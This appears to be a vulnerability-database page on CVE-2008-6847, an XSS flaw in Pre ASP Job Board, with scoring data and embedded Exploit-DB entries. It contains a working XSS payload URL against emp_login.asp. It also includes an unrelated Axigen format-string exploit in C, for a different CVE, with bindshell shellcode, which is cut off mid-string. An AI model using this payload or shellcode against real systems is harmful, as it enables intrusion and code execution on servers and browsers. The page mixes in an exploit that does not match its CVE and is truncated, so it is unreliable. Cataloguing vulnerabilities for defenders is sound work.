CVE-2008-6847
published 2009-07-02CVE-2008-6847: Cross-site scripting (XSS) vulnerability in Employee/emp_login.asp in Pre ASP Job Board allows remote attackers to inject arbitrary web script or HTML via the…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.44%
70.0th percentile
Cross-site scripting (XSS) vulnerability in Employee/emp_login.asp in Pre ASP Job Board allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting
exploitdb·2008-12-01
CVE-2008-6847 Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting
Pre ASP Job Board - 'emp_login.asp' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/32572/info
Pre ASP Job Board is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
All versions are considered vulnerable.
http://www.example.com/[Path]/Employee/emp_login.asp?msg=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281369%29%3B%22%3E
Exploit-DB
Axigen 5.0.2 - AXIMilter Remote Format String
exploitdb·2008-01-21
CVE-2008-0434 Axigen 5.0.2 - AXIMilter Remote Format String
Axigen 5.0.2 - AXIMilter Remote Format String
---
/*
* Axigen 5.0.x AXIMilter Format String Exploit
*
* by hempel (JAN 16 2008)
*
* thx to mu-b (digit-labs.org)
*
*/
#include
#include
#include
#include
#include
#include
#include
char buf[] =
"FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
"\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
"\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
"\xc0\x96\x05\x08"
/* format string */
"%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
"17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
"\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
"\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
"\xba\x90\
No writeups or analysis indexed.
http://packetstormsecurity.org/0812-exploits/preaspjob-xsscm.txthttp://www.securityfocus.com/bid/32572https://exchange.xforce.ibmcloud.com/vulnerabilities/47007http://packetstormsecurity.org/0812-exploits/preaspjob-xsscm.txthttp://www.securityfocus.com/bid/32572https://exchange.xforce.ibmcloud.com/vulnerabilities/47007
2009-07-02
Published